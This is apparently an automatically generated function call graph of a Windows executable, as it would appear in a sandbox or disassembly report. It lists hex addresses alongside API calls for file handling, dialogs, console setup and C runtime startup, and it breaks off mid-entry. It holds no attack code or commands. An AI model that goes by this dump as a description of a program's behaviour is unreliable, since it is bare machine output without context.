2aab2e SHGetMalloc 23473->23622 23475 2abdf5 98 API calls 23478 2ab4f3 23475->23478 23477 2ab3e1 23477->23433 23482 2ab3f7 UnmapViewOfFile CloseHandle 23477->23482 23556 2ad0f5 23478->23556 23479 2ab33e 23623 29ecad 80 API calls ___scrt_fastfail 23479->23623 23482->23433 23483->23477 23486 2ab3cd Sleep 23483->23486 23485 2ab355 MapViewOfFile 23485->23488 23486->23477 23486->23483 23487 2abdf5 98 API calls 23491 2ab519 23487->23491 23488->23459 23489 2ab542 23624 2912c8 GetDlgItem EnableWindow 23489->23624 23491->23489 23492 2abdf5 98 API calls 23491->23492 23492->23489 23494 29136d 23493->23494 23495 291314 23493->23495 23630 29da71 GetWindowLongW SetWindowLongW 23494->23630 23496 29137a 23495->23496 23629 29da98 62 API calls 2 library calls 23495->23629 23496->23334 23496->23335 23496->23336 23499 291336 23499->23496 23500 291349 GetDlgItem 23499->23500 23500->23496 23501 291359 23500->23501 23501->23496 23502 29135f SetWindowTextW 23501->23502 23502->23496 23506 29a059 23503->23506 23504 29a0ea 23505 29a207 9 API calls 23504->23505 23507 29a113 23504->23507 23505->23507 23506->23504 23506->23507 23631 29a207 23506->23631 23507->23401 23507->23402 23509->23408 23511 299728 23510->23511 23512 299792 CreateFileW 23511->23512 23513 299786 23511->23513 23512->23513 23514 2997e4 23513->23514 23515 29b66c 2 API calls 23513->23515 23514->23458 23516 2997cb 23515->23516 23516->23514 23517 2997cf CreateFileW 23516->23517 23517->23514 23519 299677 23518->23519 23524 299688 23518->23524 23520 29968a 23519->23520 23521 299683 23519->23521 23519->23524 23657 2996d0 23520->23657 23652 299817 23521->23652 23524->23421 23525->23438 23526->23448 23672 29ddff 23527->23672 23530 2912e6 GetDlgItem ShowWindow 23530->23465 23532 2abdff __EH_prolog 23531->23532 23533 2ab4e5 23532->23533 23534 2aaa36 ExpandEnvironmentStringsW 23532->23534 23533->23475 23542 2abe36 _wcsrchr 23534->23542 23536 2aaa36 ExpandEnvironmentStringsW 23536->23542 23537 2ac11d SetWindowTextW 23537->23542 23540 2b35de 22 API calls 23540->23542 23542->23533 23542->23536 23542->23537 23542->23540 23543 2abf0b SetFileAttributesW 23542->23543 23548 2ac2e7 GetDlgItem SetWindowTextW SendMessageW 23542->23548 23551 2ac327 SendMessageW 23542->23551 23695 2a17ac CompareStringW 23542->23695 23696 2a9da4 GetCurrentDirectoryW 23542->23696 23698 29a52a 7 API calls 23542->23698 23699 29a4b3 FindClose 23542->23699 23700 2aab9a 76 API calls ___std_exception_copy 23542->23700 23544 2abfc5 GetFileAttributesW 23543->23544 23555 2abf25 ___scrt_fastfail 23543->23555 23544->23542 23547 2abfd7 DeleteFileW 23544->23547 23547->23542 23549 2abfe8 23547->23549 23548->23542 23550 29400a _swprintf 51 API calls 23549->23550 23552 2ac008 GetFileAttributesW 23550->23552 23551->23542 23552->23549 23553 2ac01d MoveFileW 23552->23553 23553->23542 23554 2ac035 MoveFileExW 23553->23554 23554->23542 23555->23542 23555->23544 23697 29b4f7 52 API calls 2 library calls 23555->23697 23557 2ad0ff __EH_prolog 23556->23557 23701 29fead 23557->23701 23559 2ad130 23705 295c59 23559->23705 23561 2ad14e 23709 297c68 23561->23709 23565 2ad1a1 23726 297cfb 23565->23726 23567 2ab504 23567->23487 23569 2acd38 23568->23569 24189 2a9d1a 23569->24189 23572 2ab5d1 23572->23344 23572->23345 23573 2acd45 GetWindow 23573->23572 23579 2acd65 23573->23579 23574 2acd72 GetClassNameW 24194 2a17ac CompareStringW 23574->24194 23576 2acdfa GetWindow 23576->23572 23576->23579 23577 2acd96 GetWindowLongW 23577->23576 23578 2acda6 SendMessageW 23577->23578 23578->23576 23580 2acdbc GetObjectW 23578->23580 23579->23572 23579->23574 23579->23576 23579->23577 24195 2a9d5a GetDC GetDeviceCaps GetDeviceCaps ReleaseDC 23580->24195 23582 2acdd3 24196 2a9d39 GetDC GetDeviceCaps GetDeviceCaps ReleaseDC 23582->24196 24197 2a9f5d 8 API calls ___scrt_fastfail 23582->24197 23585 2acde4 SendMessageW DeleteObject 23585->23576 23586->23355 23588 2aa2e8 23587->23588 23589 2aa30d 23587->23589 24200 2a17ac CompareStringW 23588->24200 23590 2aa31b 23589->23590 23591 2aa312 SHAutoComplete 23589->23591 23595 2aa7c3 23590->23595 23591->23590 23593 2aa2fb 23593->23589 23594 2aa2ff FindWindowExW 23593->23594 23594->23589 23596 2aa7cd __EH_prolog 23595->23596 23597 291380 82 API calls 23596->23597 23598 2aa7ef 23597->23598 24201 291f4f 23598->24201 23601 2aa818 23604 291951 126 API calls 23601->23604 23602 2aa809 23603 291631 84 API calls 23602->23603 23605 2aa814 23603->23605 23607 2aa83a __vswprintf_c_l ___std_exception_copy 23604->23607 23605->23386 23605->23391 23606 291631 84 API calls 23606->23605 23607->23605 23607->23606 23608->23368 24209 2aac74 PeekMessageW 23609->24209 23612 2acb88 23618 2acb93 ShowWindow SendMessageW SendMessageW 23612->23618 23613 2acbbc SendMessageW SendMessageW 23614 2acbf8 23613->23614 23615 2acc17 SendMessageW SendMessageW SendMessageW 23613->23615 23614->23615 23616 2acc4a SendMessageW 23615->23616 23617 2acc6d SendMessageW 23615->23617 23616->23617 23617->23389 23618->23613 23619->23445 23620->23469 23621->23473 23622->23479 23623->23485 23624->23365 23625->23424 23626->23441 23627->23417 23628->23410 23629->23499 23630->23496 23632 29a214 23631->23632 23633 29a238 23632->23633 23634 29a22b CreateDirectoryW 23632->23634 23635 29a180 4 API calls 23633->23635 23634->23633 23636 29a26b 23634->23636 23637 29a23e 23635->23637 23639 29a27a 23636->23639 23644 29a444 23636->23644 23638 29a27e GetLastError 23637->23638 23640 29b66c 2 API calls 23637->23640 23638->23639 23639->23506 23642 29a254 23640->23642 23642->23638 23643 29a258 CreateDirectoryW 23642->23643 23643->23636 23643->23638 23645 2ae360 23644->23645 23646 29a451 SetFileAttributesW 23645->23646 23647 29a494 23646->23647 23648 29a467 23646->23648 23647->23639 23649 29b66c 2 API calls 23648->23649 23650 29a47b 23649->23650 23650->23647 23651 29a47f SetFileAttributesW 23650->23651 23651->23647 23653 299820 23652->23653 23656 299824 23652->23656 23653->23524 23656->23653 23663 29a12d 23656->23663 23658 2996dc 23657->23658 23661 2996fa 23657->23661 23660 2996e8 FindCloseChangeNotification 23658->23660 23658->23661 23659 299719 23659->23524 23660->23661 23661->23659 23671 296e3e 74 API calls 23661->23671 23664 2ae360 23663->23664 23665 29a13a DeleteFileW 23664->23665 23666 29a14d 23665->23666 23667 29984c 23665->23667 23668 29b66c 2 API calls 23666->23668 23667->23524 23669 29a161 23668->23669 23669->23667 23670 29a165 DeleteFileW 23669->23670 23670->23667 23671->23659 23678 29d28a 23672->23678 23675 29ddfc SetDlgItemTextW 23675->23530 23676 29de22 LoadStringW 23676->23675 23677 29de39 LoadStringW 23676->23677 23677->23675 23683 29d1c3 23678->23683 23680 29d2a7 23682 29d2bc 23680->23682 23691 29d2c8 26 API calls 23680->23691 23682->23675 23682->23676 23684 29d1de 23683->23684 23690 29d1d7 _strncpy 23683->23690 23686 29d202 23684->23686 23692 2a1596 WideCharToMultiByte 23684->23692 23689 29d233 23686->23689 23693 29dd6b 50 API calls __vsnprintf 23686->23693 23694 2b58d9 26 API calls 3 library calls 23689->23694 23690->23680 23691->23682 23692->23686 23693->23689 23694->23690 23695->23542 23696->23542 23697->23555 23698->23542 23699->23542 23700->23542 23702 29feba 23701->23702 23730 291789 23702->23730 23704 29fed2 23704->23559 23706 29fead 23705->23706 23707 291789 76 API calls 23706->23707 23708 29fed2 23707->23708 23708->23561 23710 297c72 __EH_prolog 23709->23710 23747 29c827 23710->23747 23712 297c8d 23753 2ae24a 23712->23753 23714 297cb7 23759 2a440b 23714->23759 23717 297ddf 23718 297de9 23717->23718 23723 297e53 23718->23723 23791 29a4c6 23718->23791 23720 297f06 23720->23565 23721 297ec4 23721->23720 23797 296dc1 74 API calls 23721->23797 23723->23721 23725 29a4c6 8 API calls 23723->23725 23769 29837f 23723->23769 23725->23723 23727 297d09 23726->23727 23729 297d10 23726->23729 23728 2a1acf 84 API calls 23727->23728 23728->23729 23731 29179f 23730->23731 23742 2917fa __vswprintf_c_l 23730->23742 23732 2917c8 23731->23732 23743 296e91 74 API calls __vswprintf_c_l 23731->23743 23734 291827 23732->23734 23735 2917e7 ___std_exception_copy 23732->23735 23737 2b35de 22 API calls 23734->23737 23735->23742 23745 296efd 75 API calls 23735->23745 23736 2917be 23744 296efd 75 API calls 23736->23744 23739 29182e 23737->23739 23739->23742 23746 296efd 75 API calls 23739->23746 23742->23704 23743->23736 23744->23732 23745->23742 23746->23742 23748 29c831 __EH_prolog 23747->23748 23749 2ae24a new 8 API calls 23748->23749 23750 29c874 23749->23750 23751 2ae24a new 8 API calls 23750->23751 23752 29c898 23751->23752 23752->23712 23756 2ae24f ___std_exception_copy 23753->23756 23754 2ae27b 23754->23714 23756->23754 23765 2b71ad 7 API calls 2 library calls 23756->23765 23766 2aecce RaiseException FindHandler new 23756->23766 23767 2aecb1 RaiseException Concurrency::cancel_current_task FindHandler 23756->23767 23760 2a4415 __EH_prolog 23759->23760 23761 2ae24a new 8 API calls 23760->23761 23762 2a4431 23761->23762 23763 297ce6 23762->23763 23768 2a06ba 78 API calls 23762->23768 23763->23717 23765->23756 23768->23763 23770 298389 __EH_prolog 23769->23770 23798 291380 23770->23798 23772 2983a4 23806 299ef7 23772->23806 23778 2983d3 23926 291631 23778->23926 23779 29846e 23825 298517 23779->23825 23782 2984ce 23829 291f00 23782->23829 23786 2983cf 23786->23778 23786->23779 23789 29a4c6 8 API calls 23786->23789 23930 29bac4 CompareStringW 23786->23930 23787 2984d9 23787->23778 23833 293aac 23787->23833 23843 29857b 23787->23843 23789->23786 23793 29a4db 23791->23793 23792 29a4df 23792->23718 23793->23792 24177 29a5f4 23793->24177 23795 29a4ef 23795->23792 23796 29a4f4 FindClose 23795->23796 23796->23792 23797->23720 23799 291385 __EH_prolog 23798->23799 23800 29c827 8 API calls 23799->23800 23801 2913bd 23800->23801 23802 2ae24a new 8 API calls 23801->23802 23805 291416 ___scrt_fastfail 23801->23805 23803 291403 23802->23803 23803->23805 23932 29b07d 23803->23932 23805->23772 23807 299f0e 23806->23807 23808 2983ba 23807->23808 23948 296f5d 76 API calls 23807->23948 23808->23778 23810 2919a6 23808->23810 23811 2919b0 __EH_prolog 23810->23811 23821 291a00 23811->23821 23824 2919e5 23811->23824 23949 29709d 23811->23949 23813 291b50 23952 296dc1 74 API calls 23813->23952 23815 293aac 97 API calls 23819 291bb3 23815->23819 23816 291b60 23816->23815 23816->23824 23817 291bff 23823 291c32 23817->23823 23817->23824 23953 296dc1 74 API calls 23817->23953 23819->23817 23820 293aac 97 API calls 23819->23820 23820->23819 23821->23813 23821->23816 23821->23824 23822 293aac 97 API calls 23822->23823 23823->23822 23823->23824 23824->23786 23826 298524 23825->23826 23971 2a0c26 GetSystemTime SystemTimeToFileTime 23826->23971 23828 298488 23828->23782 23931 2a1359 72 API calls 23828->23931 23830 291f05 __EH_prolog 23829->23830 23832 291f39 23830->23832 23973 291951 23830->23973 23832->23787 23834 293ab8 23833->23834 23835 293abc 23833->23835 23834->23787 23836 293ae9 23835->23836 23837 293af7 23835->23837 23840 293b29 23836->23840 24107 293281 85 API calls 3 library calls 23836->24107 24108 2927e8 97 API calls 3 library calls 23837->24108 23840->23787 23841 293af5 23841->23840 24109 29204e 74 API calls 23841->24109 23844 298585 __EH_prolog 23843->23844 23845 2985be 23844->23845 23853 2985c2 23844->23853 24131 2a84bd 99 API calls 23844->24131 23846 2985e7 23845->23846 23850 29867a 23845->23850 23845->23853 23848 298609 23846->23848 23846->23853 24132 297b66 151 API calls 23846->24132 23848->23853 24133 2a84bd 99 API calls 23848->24133 23850->23853 24110 295e3a 23850->24110 23853->23787 23854 298705 23854->23853 24116 29826a 23854->24116 23857 298875 23858 29a4c6 8 API calls 23857->23858 23859 2988e0 23857->23859 23858->23859 24120 297d6c 23859->24120 23861 29c991 80 API calls 23869 29893b _memcmp 23861->23869 23862 298a70 23863 298b43 23862->23863 23870 298abf 23862->23870 23867 298b9e 23863->23867 23880 298b4e 23863->23880 23864 298a69 24136 291f94 74 API calls 23864->24136 23877 298b30 23867->23877 24139 2980ea 96 API calls 23867->24139 23868 298b9c 23873 299653 79 API calls 23868->23873 23869->23853 23869->23861 23869->23862 23869->23864 24134 298236 82 API calls 23869->24134 24135 291f94 74 API calls 23869->24135 23874 29a180 4 API calls 23870->23874 23870->23877 23872 299653 79 API calls 23872->23853 23873->23853 23876 298af7 23874->23876 23875 298c09 23889 298c74 23875->23889 23925 2991c1 pre_c_initialization 23875->23925 24140 299989 23875->24140 23876->23877 24137 299377 96 API calls 23876->24137 23877->23868 23877->23875 23878 29aa88 8 API calls 23882 298cc3 23878->23882 23880->23868 24138 297f26 100 API calls pre_c_initialization 23880->24138 23885 29aa88 8 API calls 23882->23885 23883 298c4c 23883->23889 24144 291f94 74 API calls 23883->24144 23902 298cd9 23885->23902 23887 298c62 24145 297061 75 API calls 23887->24145 23889->23878 23890 298efd 23896 298f0f 23890->23896 23897 298f23 23890->23897 23913 298e27 23890->23913 23891 298df7 23893 298e69 23891->23893 23895 298e07 23891->23895 23892 298d9c 23892->23890 23892->23891 23894 29826a CharUpperW 23893->23894 23898 298e84 23894->23898 23899 298e4d 23895->23899 23906 298e15 23895->23906 23900 2992e6 121 API calls 23896->23900 23901 2a2c42 75 API calls 23897->23901 23908 298ead 23898->23908 23909 298eb4 23898->23909 23898->23913 23899->23913 24148 297907 108 API calls 23899->24148 23900->23913 23904 298f3c 23901->23904 23902->23892 24146 299b21 SetFilePointer GetLastError SetEndOfFile 23902->24146 24151 2a28f1 121 API calls 23904->24151 24147 291f94 74 API calls 23906->24147 24149 297698 84 API calls pre_c_initialization 23908->24149 24150 299224 94 API calls __EH_prolog 23909->24150 23916 29904b 23913->23916 24152 291f94 74 API calls 23913->24152 23915 299156 23917 29a444 4 API calls 23915->23917 23915->23925 23916->23915 23918 299104 23916->23918 23916->23925 24153 299ebf SetEndOfFile 23916->24153 23921 2991b1 23917->23921 24126 299d62 23918->24126 23921->23925 24154 291f94 74 API calls 23921->24154 23922 29914b 23924 2996d0 75 API calls 23922->23924 23924->23915 23925->23872 23927 291643 23926->23927 24169 29c8ca 23927->24169 23930->23786 23931->23782 23933 29b087 __EH_prolog 23932->23933 23938 29ea80 80 API calls 23933->23938 23935 29b099 23939 29b195 23935->23939 23938->23935 23940 29b1a7 ___scrt_fastfail 23939->23940 23943 2a0948 23940->23943 23946 2a0908 GetCurrentProcess GetProcessAffinityMask 23943->23946 23947 29b10f 23946->23947 23947->23805 23948->23808 23954 2916d2 23949->23954 23951 2970b9 23951->23821 23952->23824 23953->23823 23955 2916e8 23954->23955 23956 291740 __vswprintf_c_l 23954->23956 23957 291711 23955->23957 23967 296e91 74 API calls __vswprintf_c_l 23955->23967 23956->23951 23959 291767 23957->23959 23964 29172d ___std_exception_copy 23957->23964 23961 2b35de 22 API calls 23959->23961 23960 291707 23968 296efd 75 API calls 23960->23968 23963 29176e 23961->23963 23963->23956 23970 296efd 75 API calls 23963->23970 23964->23956 23969 296efd 75 API calls 23964->23969 23967->23960 23968->23957 23969->23956 23970->23956 23972 2a0c56 __vswprintf_c_l 23971->23972 23972->23828 23974 291961 23973->23974 23976 29195d 23973->23976 23977 291896 23974->23977 23976->23832 23978 2918a8 23977->23978 23979 2918e5 23977->23979 23980 293aac 97 API calls 23978->23980 23985 293f18 23979->23985 23983 2918c8 23980->23983 23983->23976 23987 293f21 23985->23987 23986 293aac 97 API calls 23986->23987 23987->23986 23989 291906 23987->23989 24002 2a067c 23987->24002 23989->23983 23990 291e00 23989->23990 23991 291e0a __EH_prolog 23990->23991 24010 293b3d 23991->24010 23993 291e34 23994 2916d2 76 API calls 23993->23994 24001 291ebb 23993->24001 23995 291e4b 23994->23995 24038 291849 76 API calls 23995->24038 23997 291e63 23999 291e6f 23997->23999 24039 2a137a MultiByteToWideChar 23997->24039 24040 291849 76 API calls 23999->24040 24001->23983 24004 2a0683 24002->24004 24003 2a069e 24006 2a06af SetThreadExecutionState 24003->24006 24009 296e8c RaiseException FindHandler 24003->24009 24004->24003 24008 296e8c RaiseException FindHandler 24004->24008 24006->23987 24008->24003 24009->24006 24011 293b47 __EH_prolog 24010->24011 24012 293b79 24011->24012 24013 293b5d 24011->24013 24015 293dc2 24012->24015 24018 293ba5 24012->24018 24069 296dc1 74 API calls 24013->24069 24086 296dc1 74 API calls 24015->24086 24017 293b68 24017->23993 24018->24017 24041 2a2c42 24018->24041 24020 293c26 24021 293cb1 24020->24021 24037 293c1d 24020->24037 24072 29c991 24020->24072 24054 29aa88 24021->24054 24022 293c22 24022->24020 24071 292034 76 API calls 24022->24071 24024 293c12 24070 296dc1 74 API calls 24024->24070 24025 293bf4 24025->24020 24025->24022 24025->24024 24028 293cc4 24031 293d48 24028->24031 24032 293d3e 24028->24032 24078 2a28f1 121 API calls 24031->24078 24058 2992e6 24032->24058 24035 293d46 24035->24037 24079 291f94 74 API calls 24035->24079 24080 2a1acf 24037->24080 24038->23997 24039->23999 24040->24001 24042 2a2c51 24041->24042 24044 2a2c5b 24041->24044 24087 296efd 75 API calls 24042->24087 24046 2a2ca2 ___std_exception_copy 24044->24046 24047 2a2c9d Concurrency::cancel_current_task 24044->24047 24052 2a2cfd ___scrt_fastfail 24044->24052 24045 2a2da9 Concurrency::cancel_current_task 24090 2b157a RaiseException 24045->24090 24046->24045 24048 2a2cd9 24046->24048 24046->24052 24089 2b157a RaiseException 24047->24089 24088 2a2b7b 75 API calls 4 library calls 24048->24088 24052->24025 24053 2a2dc1 24055 29aa95 24054->24055 24057 29aa9f 24054->24057 24056 2ae24a new 8 API calls 24055->24056 24056->24057 24057->24028 24059 2992f0 __EH_prolog 24058->24059 24091 297dc6 24059->24091 24062 29709d 76 API calls 24063 299302 24062->24063 24094 29ca6c 24063->24094 24065 29935c 24065->24035 24066 29ca6c 114 API calls 24068 299314 24066->24068 24068->24065 24068->24066 24103 29cc51 97 API calls __vswprintf_c_l 24068->24103 24069->24017 24070->24037 24071->24020 24073 29c9b2 24072->24073 24074 29c9c4 24072->24074 24104 296249 80 API calls 24073->24104 24105 296249 80 API calls 24074->24105 24077 29c9bc 24077->24021 24078->24035 24079->24037 24081 2a1ad9 24080->24081 24082 2a1af2 24081->24082 24085 2a1b06 24081->24085 24106 2a075b 84 API calls 24082->24106 24084 2a1af9 24084->24085 24086->24017 24087->24044 24088->24052 24089->24045 24090->24053 24092 29acf5 GetVersionExW 24091->24092 24093 297dcb 24092->24093 24093->24062 24095 29ca82 __vswprintf_c_l 24094->24095 24096 29cbf7 24095->24096 24100 2a84bd 99 API calls 24095->24100 24101 29cbee 24095->24101 24102 29ab70 89 API calls 24095->24102 24097 29ca0b 6 API calls 24096->24097 24099 29cc1f 24096->24099 24097->24099 24098 2a067c SetThreadExecutionState RaiseException 24098->24101 24099->24098 24100->24095 24101->24068 24102->24095 24103->24068 24104->24077 24105->24077 24106->24084 24107->23841 24108->23841 24109->23840 24111 295e4a 24110->24111 24155 295d67 24111->24155 24114 295e7d 24115 295eb5 24114->24115 24160 29ad65 CharUpperW CompareStringW 24114->24160 24115->23854 24117 298289 24116->24117 24166 2a179d CharUpperW 24117->24166 24119 298333 24119->23857 24121 297d7b 24120->24121 24122 297dbb 24121->24122 24167 297043 74 API calls 24121->24167 24122->23869 24124 297db3 24168 296dc1 74 API calls 24124->24168 24127 299d73 24126->24127 24129 299d82 24126->24129 24128 299d79 FlushFileBuffers 24127->24128 24127->24129 24128->24129 24130 299dfb SetFileTime 24129->24130 24130->23922 24131->23845 24132->23848 24133->23853 24134->23869 24135->23869 24136->23862 24137->23877 24138->23868 24139->23877 24141 29998f 24140->24141 24142 299992 GetFileType 24140->24142 24141->23883 24143 2999a0 24142->24143 24143->23883 24144->23887 24145->23889 24146->23892 24147->23913 24148->23913 24149->23913 24150->23913 24151->23913 24152->23916 24153->23918 24154->23925 24161 295c64 24155->24161 24158 295c64 2 API calls 24159 295d88 24158->24159 24159->24114 24160->24114 24163 295c6e 24161->24163 24162 295d56 24162->24158 24162->24159 24163->24162 24165 29ad65 CharUpperW CompareStringW 24163->24165 24165->24163 24166->24119 24167->24124 24168->24122 24170 29c8db 24169->24170 24175 29a90e 84 API calls 24170->24175 24172 29c90d 24176 29a90e 84 API calls 24172->24176 24174 29c918 24175->24172 24176->24174 24178 29a5fe 24177->24178 24179 29a691 FindNextFileW 24178->24179 24180 29a621 FindFirstFileW 24178->24180 24181 29a69c GetLastError 24179->24181 24182 29a6b0 24179->24182 24183 29a638 24180->24183 24188 29a675 24180->24188 24181->24182 24182->24188 24184 29b66c 2 API calls 24183->24184 24185 29a64d 24184->24185 24186 29a66a GetLastError 24185->24186 24187 29a651 FindFirstFileW 24185->24187 24186->24188 24187->24186 24187->24188 24188->23795 24198 2a9d39 GetDC GetDeviceCaps GetDeviceCaps ReleaseDC 24189->24198 24191 2a9d21 24192 2a9d2d 24191->24192 24199 2a9d5a GetDC GetDeviceCaps GetDeviceCaps ReleaseDC 24191->24199 24192->23572 24192->23573 24194->23579 24195->23582 24196->23582 24197->23585 24198->24191 24199->24192 24200->23593 24202 299ef7 76 API calls 24201->24202 24203 291f5b 24202->24203 24204 2919a6 97 API calls 24203->24204 24207 291f78 24203->24207 24205 291f68 24204->24205 24205->24207 24208 296dc1 74 API calls 24205->24208 24207->23601 24207->23602 24208->24207 24210 2aacc8 GetDlgItem 24209->24210 24211 2aac8f GetMessageW 24209->24211 24210->23612 24210->23613 24212 2aacb4 TranslateMessage DispatchMessageW 24211->24212 24213 2aaca5 IsDialogMessageW 24211->24213 24212->24210 24213->24210 24213->24212 24767 2ab8e0 93 API calls _swprintf 24768 2a8ce0 CompareStringW ShowWindow SetWindowTextW GlobalAlloc WideCharToMultiByte 24771 2c16e0 CloseHandle 24216 2ae1f9 24217 2ae203 24216->24217 24218 2adf59 ___delayLoadHelper2@8 19 API calls 24217->24218 24219 2ae210 24218->24219 24811 2babfd 6 API calls ___delayLoadHelper2@8 24813 2aebf7 20 API calls 24774 2aa8c2 GetDlgItem EnableWindow ShowWindow SendMessageW 24776 2aeac0 27 API calls pre_c_initialization 24816 2bebc1 21 API calls __vswprintf_c_l 24817 2a97c0 10 API calls 24778 2b9ec0 21 API calls 24818 2bb5c0 GetCommandLineA GetCommandLineW 24256 2aead2 24257 2aeade ___DestructExceptionObject 24256->24257 24282 2ae5c7 24257->24282 24259 2aeae5 24261 2aeb0e 24259->24261 24362 2aef05 IsProcessorFeaturePresent IsDebuggerPresent SetUnhandledExceptionFilter UnhandledExceptionFilter ___scrt_fastfail 24259->24362 24269 2aeb4d ___scrt_is_nonwritable_in_current_image ___scrt_release_startup_lock 24261->24269 24293 2b824d 24261->24293 24265 2aeb2d ___DestructExceptionObject 24266 2aebad 24301 2af020 24266->24301 24269->24266 24363 2b7243 38 API calls 3 library calls 24269->24363 24277 2aebd9 24279 2aebe2 24277->24279 24364 2b764a 28 API calls _abort 24277->24364 24365 2ae73e 13 API calls 2 library calls 24279->24365 24283 2ae5d0 24282->24283 24366 2aed5b IsProcessorFeaturePresent 24283->24366 24285 2ae5dc 24367 2b2016 24285->24367 24287 2ae5e1 24288 2ae5e5 24287->24288 24376 2b80d7 24287->24376 24288->24259 24291 2ae5fc 24291->24259 24296 2b8264 24293->24296 24294 2aec4a ___delayLoadHelper2@8 5 API calls 24295 2aeb27 24294->24295 24295->24265 24297 2b81f1 24295->24297 24296->24294 24300 2b8220 24297->24300 24298 2aec4a ___delayLoadHelper2@8 5 API calls 24299 2b8249 24298->24299 24299->24269 24300->24298 24426 2af350 24301->24426 24304 2aebb3 24305 2b819e 24304->24305 24306 2bb290 51 API calls 24305->24306 24308 2b81a7 24306->24308 24307 2aebbc 24310 2ad5d4 24307->24310 24308->24307 24428 2bb59a 38 API calls 24308->24428 24429 2a00cf 24310->24429 24314 2ad5f3 24478 2aa335 24314->24478 24316 2ad5fc 24482 2a13b3 GetCPInfo 24316->24482 24318 2ad606 ___scrt_fastfail 24319 2ad619 GetCommandLineW 24318->24319 24320 2ad628 24319->24320 24321 2ad6a6 GetModuleFileNameW SetEnvironmentVariableW GetLocalTime 24319->24321 24485 2abc84 24320->24485 24322 29400a _swprintf 51 API calls 24321->24322 24324 2ad70d SetEnvironmentVariableW GetModuleHandleW LoadIconW 24322->24324 24496 2aaded LoadBitmapW 24324->24496 24327 2ad6a0 24490 2ad287 24327->24490 24328 2ad636 OpenFileMappingW 24331 2ad64f MapViewOfFile 24328->24331 24332 2ad696 CloseHandle 24328->24332 24334 2ad68d UnmapViewOfFile 24331->24334 24335 2ad660 __vswprintf_c_l 24331->24335 24332->24321 24334->24332 24339 2ad287 2 API calls 24335->24339 24341 2ad67c 24339->24341 24340 2a8835 8 API calls 24342 2ad76a DialogBoxParamW 24340->24342 24341->24334 24343 2ad7a4 24342->24343 24344 2ad7bd 24343->24344 24345 2ad7b6 Sleep 24343->24345 24348 2ad7cb 24344->24348 24526 2aa544 CompareStringW SetCurrentDirectoryW ___scrt_fastfail 24344->24526 24345->24344 24347 2ad7ea DeleteObject 24349 2ad7ff DeleteObject 24347->24349 24350 2ad806 24347->24350 24348->24347 24349->24350 24351 2ad849 24350->24351 24352 2ad837 24350->24352 24523 2aa39d 24351->24523 24527 2ad2e6 6 API calls 24352->24527 24354 2ad83d CloseHandle 24354->24351 24356 2ad883 24357 2b757e GetModuleHandleW 24356->24357 24358 2aebcf 24357->24358 24358->24277 24359 2b76a7 24358->24359 24661 2b7424 24359->24661 24362->24259 24363->24266 24364->24279 24365->24265 24366->24285 24368 2b201b ___vcrt_initialize_pure_virtual_call_handler ___vcrt_initialize_winapi_thunks 24367->24368 24380 2b310e 24368->24380 24372 2b2031 24373 2b203c 24372->24373 24394 2b314a DeleteCriticalSection 24372->24394 24373->24287 24375 2b2029 24375->24287 24422 2bb73a 24376->24422 24379 2b203f 8 API calls 3 library calls 24379->24288 24381 2b3117 24380->24381 24383 2b3140 24381->24383 24385 2b2025 24381->24385 24395 2b3385 24381->24395 24400 2b314a DeleteCriticalSection 24383->24400 24385->24375 24386 2b215c 24385->24386 24415 2b329a 24386->24415 24388 2b2166 24393 2b2171 24388->24393 24420 2b3348 6 API calls try_get_function 24388->24420 24390 2b217f 24391 2b218c 24390->24391 24421 2b218f 6 API calls ___vcrt_FlsFree 24390->24421 24391->24372 24393->24372 24394->24375 24401 2b3179 24395->24401 24398 2b33bc InitializeCriticalSectionAndSpinCount 24399 2b33a8 24398->24399 24399->24381 24400->24385 24402 2b31a9 24401->24402 24403 2b31ad 24401->24403 24402->24403 24407 2b31cd 24402->24407 24408 2b3219 24402->24408 24403->24398 24403->24399 24405 2b31d9 GetProcAddress 24406 2b31e9 __crt_fast_encode_pointer 24405->24406 24406->24403 24407->24403 24407->24405 24409 2b3241 LoadLibraryExW 24408->24409 24410 2b3236 24408->24410 24411 2b325d GetLastError 24409->24411 24412 2b3275 24409->24412 24410->24402 24411->24412 24414 2b3268 LoadLibraryExW 24411->24414 24412->24410 24413 2b328c FreeLibrary 24412->24413 24413->24410 24414->24412 24416 2b3179 try_get_function 5 API calls 24415->24416 24417 2b32b4 24416->24417 24418 2b32cc TlsAlloc 24417->24418 24419 2b32bd 24417->24419 24419->24388 24420->24390 24421->24393 24425 2bb753 24422->24425 24423 2aec4a ___delayLoadHelper2@8 5 API calls 24424 2ae5ee 24423->24424 24424->24291 24424->24379 24425->24423 24427 2af033 GetStartupInfoW 24426->24427 24427->24304 24428->24308 24430 2ae360 24429->24430 24431 2a00d9 GetModuleHandleW 24430->24431 24432 2a00f0 GetProcAddress 24431->24432 24433 2a0154 24431->24433 24435 2a0109 24432->24435 24436 2a0121 GetProcAddress 24432->24436 24434 2a0484 GetModuleFileNameW 24433->24434 24537 2b70dd 42 API calls 2 library calls 24433->24537 24449 2a04a3 24434->24449 24435->24436 24436->24433 24437 2a0133 24436->24437 24437->24433 24439 2a03be 24439->24434 24440 2a03c9 GetModuleFileNameW CreateFileW 24439->24440 24441 2a0478 CloseHandle 24440->24441 24442 2a03fc SetFilePointer 24440->24442 24441->24434 24442->24441 24443 2a040c ReadFile 24442->24443 24443->24441 24445 2a042b 24443->24445 24445->24441 24448 2a0085 2 API calls 24445->24448 24447 2a04d2 CompareStringW 24447->24449 24448->24445 24449->24447 24450 2a0508 GetFileAttributesW 24449->24450 24451 2a0520 24449->24451 24528 29acf5 24449->24528 24531 2a0085 24449->24531 24450->24449 24450->24451 24452 2a052a 24451->24452 24454 2a0560 24451->24454 24455 2a0542 GetFileAttributesW 24452->24455 24457 2a055a 24452->24457 24453 2a066f 24477 2a9da4 GetCurrentDirectoryW 24453->24477 24454->24453 24456 29acf5 GetVersionExW 24454->24456 24455->24452 24455->24457 24458 2a057a 24456->24458 24457->24454 24459 2a0581 24458->24459 24460 2a05e7 24458->24460 24462 2a0085 2 API calls 24459->24462 24461 29400a _swprintf 51 API calls 24460->24461 24463 2a060f AllocConsole 24461->24463 24464 2a058b 24462->24464 24465 2a061c GetCurrentProcessId AttachConsole 24463->24465 24466 2a0667 ExitProcess 24463->24466 24467 2a0085 2 API calls 24464->24467 24538 2b35b3 24465->24538 24469 2a0595 24467->24469 24471 29ddd1 53 API calls 24469->24471 24470 2a063d GetStdHandle WriteConsoleW Sleep FreeConsole 24470->24466 24472 2a05b0 24471->24472 24473 29400a _swprintf 51 API calls 24472->24473 24474 2a05c3 24473->24474 24475 29ddd1 53 API calls 24474->24475 24476 2a05d2 24475->24476 24476->24466 24477->24314 24479 